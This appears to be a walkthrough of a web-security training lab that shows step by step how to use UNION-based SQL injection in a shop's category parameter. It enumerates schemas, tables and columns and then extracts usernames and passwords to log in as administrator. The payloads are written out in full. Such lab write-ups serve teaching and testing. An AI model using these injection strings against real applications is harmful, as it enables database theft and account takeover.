Skip to main content

SQL injection attack, listing the database contents on non-Oracle databases

1

Let's filter for Food & Drink.

2

Since we are proxying the traffic through Burp Suite, we can go to the Proxy > HTTP History tab to view this request.

3

Let's forward the request to the Repeater for further modification.

Once in the Repeater, let's set the category parameter to the following:

' UNION SELECT 'test'--

4

Since the application returns an error, we know that the number of columns in the current query is more than 1.

Let's set the category parameter to the following:

' UNION SELECT 'test','test'--

5

Now that we know the current query has two columns, we can start enumerating the databases.

' UNION SELECT schema_name, NULL FROM information_schema.schemata--

20

Now let's enumerate the tables present in the public database by setting the category parameter to:

' UNION SELECT table_name, NULL FROM information_schema.tables WHERE table_schema='public'--

21

Next, we need to find the columns present in the users_bfbtjz table.

We can do that by setting the category parameter to the following:

' UNION SELECT column_name, NULL FROM information_schema.columns WHERE table_name='users_bfbtjz'--

22

We can now retrieve the usernames and password from the username_ylkdae and password_sdbuqk columns respectively.

For that we have to set the category parameter to the following:

' UNION SELECT username_ylkdae, password_sdbuqk FROM users_bfbtjz--

23

We can now login as the administrator using the following credentials:

UsernamePassword
administratorx3lp8yt4oyymkeu9bppm

9

We have solved the lab.

10